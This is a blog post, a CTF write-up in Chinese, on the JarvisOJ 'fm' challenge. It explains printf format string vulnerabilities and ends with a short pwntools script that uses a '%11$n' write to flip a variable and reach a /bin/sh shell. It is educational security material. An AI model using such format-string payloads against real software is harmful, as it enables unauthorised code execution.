<!DOCTYPE html><html lang="zh-Hans"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="61DCTF fm の Write-Up"><meta name="keywords" content="PWN,61DCTF,Stack"><meta name="author" content="ColdSnap"><meta name="copyright" content="ColdSnap"><title>61DCTF fm の Write-Up | ColdSnap の Blog</title><link rel="shortcut icon" href="/favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.8.2"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.8.2"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script>(adsbygoogle = window.adsbygoogle || []).push({
  google_ad_client: 'ca-pub-4826942730187324',
  enable_page_level_ads: 'true'
});
</script><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: {"path":"search.xml","languages":{"hits_empty":"找不到您查询的内容:${query}"}},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  hexoVersion: '6.3.0'
} </script><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="ColdSnap の Blog" type="application/atom+xml">
</head><body><canvas class="fireworks"></canvas><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="切换文章详情">切换站点概览</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">目录</div><div class="sidebar-toc__progress"><span class="progress-notice">你已经读了</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Introduction"><span class="toc-number">1.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Analysis"><span class="toc-number">2.</span> <span class="toc-text">Analysis</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Vulnerability"><span class="toc-number">3.</span> <span class="toc-text">Vulnerability</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PWN"><span class="toc-number">4.</span> <span class="toc-text">PWN</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">ColdSnap</div><div class="author-info__description text-center">Welcome to ColdSnap の Blog</div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/Coldwave96">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">文章</span><span class="pull-right">91</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">标签</span><span class="pull-right">41</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">分类</span><span class="pull-right">35</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://bodhidharmalu.github.io">Tigerlu</a><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="http://ghealer.top">Ghealer</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(/img/background.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">ColdSnap の Blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/Library">Library</a><a class="site-page" href="/Tools">Tools</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> 搜索</span></a></span></div><div id="post-info"><div id="post-title">61DCTF fm の Write-Up</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2020-09-08</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/WriteUPs/">WriteUPs</a><i class="fa fa-angle-right" aria-hidden="true"></i><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/WriteUPs/JarvisOJ/">JarvisOJ</a><div class="post-meta-wordcount"><span>字数总计: </span><span class="word-count">1.6k</span><span class="post-meta__separator">|</span><span>阅读时长: 5 分钟</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><p>程序运行截图：</p>
<p><img src="/img/fm/fm1.png"></p>
<span id="more"></span>

<p>checksec发现存在Canary以及DEP保护：</p>
<p><img src="/img/fm/fm2.png"></p>
<h2 id="Analysis"><a href="#Analysis" class="headerlink" title="Analysis"></a>Analysis</h2><p>将程序通过IDA打开，首先是main函数：</p>
<p><img src="/img/fm/fm3.png"></p>
<p>可以看到主函数里就已经存在<code>system(&quot;/bin/sh&quot;)</code>的语句，基本思路当然要满足跳转条件，执行该语句。</p>
<p>根据运行结果可以知道这个<code>x</code>在程序中被定为3，我们需要将其改为4。而在<code>printf(&amp;buf)</code>这里存在典型的格式化字符串漏洞，通过该漏洞可以实现任意内存写入。</p>
<h2 id="Vulnerability"><a href="#Vulnerability" class="headerlink" title="Vulnerability"></a>Vulnerability</h2><p>解题关键在于了解格式化字符串漏洞，而在了解这个漏洞之前，首先要了解一下printf函数（其他函数类似sprintf、fprintf等print家族函数都会存在同样的问题）。</p>
<p>printf函数用法是<code>printf(“格式化字符串”, 参数…)</code>，函数返回值是int类型，返回正确输出的字符个数。如果输出失败，返回负值。参数个数不确定，可以是多个，也可以没有参数。</p>
<p>prtintf函数的格式化字符串常见的有下面几种：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">%a  浮点数、十六进制数字和p-记数法（c99</span><br><span class="line">%A  浮点数、十六进制数字和p-记法（c99）</span><br><span class="line">%c  一个字符(char)</span><br><span class="line">%C  一个ISO宽字符</span><br><span class="line">%d  有符号十进制整数(int)（%ld、%Ld：长整型数据(long),%hd：输出短整形。）　</span><br><span class="line">%e  浮点数、e-记数法</span><br><span class="line">%E  浮点数、E-记数法</span><br><span class="line">%f  单精度浮点数(默认float)、十进制记数法（%.nf  这里n表示精确到小数位后n位.十进制计数）</span><br><span class="line">%g  根据数值不同自动选择%f或%e．</span><br><span class="line">%G  根据数值不同自动选择%f或%e.</span><br><span class="line">%i  有符号十进制数（与%d相同）</span><br><span class="line">%o  无符号八进制整数</span><br><span class="line">%p  指针</span><br><span class="line">%s  对应字符串char*（%s = %hs = %hS 输出 窄字符）</span><br><span class="line">%S  对应宽字符串WCAHR*（%ws = %S 输出宽字符串）</span><br><span class="line">%u  无符号十进制整数(unsigned int)</span><br><span class="line">%x  使用十六进制数字0xf的无符号十六进制整数　</span><br><span class="line">%X  使用十六进制数字0xf的无符号十六进制整数</span><br><span class="line">%%  打印一个百分号</span><br></pre></td></tr></table></figure>

<p>还有不常见的%n，会将%n之前打印出来的字符个数赋值给一个变量。此外还有%hn（写入目标空间2字节），%hhn（写入目标空间1字节），%lln（写入目标空间8字节）。</p>
<p>例如这样一个程序：</p>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># include &lt;stdio.h&gt;</span></span><br><span class="line"><span class="function"><span class="built_in">int</span> <span class="title">main</span>()</span>&#123;</span><br><span class="line">  <span class="built_in">int</span> n = <span class="number">0</span>;</span><br><span class="line">  printf(<span class="string">&quot;test%n\n&quot;</span>, &amp;n);</span><br><span class="line">  printf(<span class="string">&quot;n is %d\n&quot;</span>, n);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>程序编译运行之后输出的n是4。</p>
<p>接下来就可以去了解一下格式化字符串漏洞了。正确的printf函数用法应该是这样的：</p>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#include &lt;stdio.h&gt;</span></span><br><span class="line"><span class="function"><span class="built_in">int</span> <span class="title">main</span>()</span>&#123;</span><br><span class="line">  <span class="built_in">int</span> n = <span class="number">6</span>;</span><br><span class="line">  printf(<span class="string">&quot;%d\n&quot;</span>, n);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>而有时候也会被省略成这样：</p>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"># include &lt;stdio.h&gt;</span></span><br><span class="line"><span class="function"><span class="built_in">int</span> <span class="title">main</span>()</span>&#123;</span><br><span class="line">  <span class="built_in">char</span> a[] = <span class="string">&quot;coldsnap&quot;</span>;</span><br><span class="line">  printf(n);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>两种方式写法上没什么问题，但是当把字符串输入权交给用户时，就会造成严重的问题。考虑这样一个程序：</p>
<figure class="highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#include &lt;stdio.h&gt;</span></span><br><span class="line"><span class="meta">#include &lt;stdlib.h&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="built_in">int</span> <span class="title">main</span>(<span class="params"><span class="built_in">int</span> argc, <span class="built_in">char</span> *argv[]</span>)</span> &#123;</span><br><span class="line">	<span class="built_in">char</span> s[<span class="number">100</span>];</span><br><span class="line">	scanf(<span class="string">&quot;%s&quot;</span>, s);</span><br><span class="line">	printf(s);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>如果用户输入的不是正常的字符串，而是格式化字符串<code>%x%x</code>，则会输出内存中的数据：</p>
<p><img src="/img/fm/fm4.png"></p>
<p>这是由于printf函数并不知道参数个数，在其内部有个指针，用来检索格式化字符串。对于特定类型的格式化字符串，去取相应参数的值，直到结束。所以尽管程序中没有参数，上面的代码也会将输入的fromat string后面的内存当作参数以%x即16进制方式输出，造成内存泄漏的问题。</p>
<p>通过内存泄露问题就要引申到任意内存读取的问题上，当然前提是需要确定局部变量是储存在栈中，这样理论上通过很多个<code>%x</code>就可以读到想要的内存位置。</p>
<p>也可通过<code>%&lt; number&gt;$x</code>是直接读取第number个位置的参数，同样可以用在%n，%d等等。</p>
<p>但是需要注意64位程序，前6个参数是存在寄存器中的，从第7个参数开始才会出现在栈中，所以栈中从格式化串开始的第一个，应该是<code>%7$n</code>。</p>
<p>甚至通过这个漏洞可以实现任意地址写入，需要用到linux自带的printf命令，将shellcode编码转义为字符。（注意用反引号将printf命令括住，反引号在Tab键的上面，反引号内的内容会被当做命令执行。）如果是用scanf输入字符串，则无法使用printf命令，只能对照ascii码表，scanf和命令行输入的shellcode编码不能直接被转义。</p>
<p>例如通过<code>&quot;</code>printf ‘\x41\x41\x41\x41’<code>&quot;</code>将0x41414141这个地址写入内存，下面只需用%s读取对应位置，就能读取以0x41414141为首地址的字符串。</p>
<p>如果用%n就能将0x41414141这个地址指向的值修改，就能造成任意内存的修改，可以将栈中返回地址修改为想要执行的shellcode的首地址等等。</p>
<p>这里要注意ASLR的问题。</p>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><p>接下来就来继续分析刚开始那道题。</p>
<p>通过Analysis部分的分析，程序中存在格式化字符串漏洞。通过<code>x_addr%[i]$n</code>命令，可以将已经输出的字符个数写入到指定的参数中，这个格式化字符串会在栈上的某处，需要定位x_addr作为printf的第几个参数来确定[i]的值，由于x_addr在32位程序中刚好是4个字节，所以这个格式化字符串刚好能把相应参数变为4。</p>
<p>首先是main函数中的x位置，根据下图x_addr应该是0x804a02c：</p>
<p><img src="/img/fm/fm5.png"></p>
<p>然后再确定偏移：</p>
<p><img src="/img/fm/fm6.png"></p>
<p>将程序断在printf函数，发现输入的数据“aaaaaa”在栈上地址为0xffb171ec，原来数据的地址为0xffb171c0。两者地址差值便是偏移为44。这个程序是32位程序，每个格式化字符串位4字节，所以偏移数为11。</p>
<p>最后就是写脚本了：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./fm&#x27;</span>)</span><br><span class="line"><span class="comment"># sh = remote(&#x27;pwn2.jarvisoj.com&#x27;, &#x27;9895&#x27;)</span></span><br><span class="line"></span><br><span class="line">x_addr = <span class="number">0x804a02c</span></span><br><span class="line"></span><br><span class="line">payload = p32(x_addr) + <span class="string">&quot;%11$n&quot;</span></span><br><span class="line"></span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br><span class="line">sh.close()</span><br></pre></td></tr></table></figure>

<p>脚本本地运行结果：</p>
<p><img src="/img/fm/fm7.png"></p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">ColdSnap</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://coldwave96.github.io/2020/09/08/61DCTF-fm/">https://coldwave96.github.io/2020/09/08/61DCTF-fm/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://coldwave96.github.io">ColdSnap の Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/PWN/">PWN</a><a class="post-meta__tags" href="/tags/61DCTF/">61DCTF</a><a class="post-meta__tags" href="/tags/Stack/">Stack</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/10/10/HW-Vuln/"><i class="fa fa-chevron-left">  </i><span>2020 HW - 漏洞汇总</span></a></div><div class="next-post pull-right"><a href="/2020/09/03/HTTP/"><span>Jarvis OJ - HTTP の Write-Up</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == 'true';
var verify = 'false' == 'true';
var record_ip = '' == 'true';
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  recordIP:record_ip,
  appId:'R82KAmOmkqMWNJs72Fx4ub1O-gzGzoHsz',
  appKey:'Sq4B8VcTqxJ2qCeJLJa3KbKz',
  placeholder:'Please leave something ^.^',
  avatar:'mm',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(/img/background.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2019 - 2025 By ColdSnap</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="icp"><a><span>Welcome to my world ^.^</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>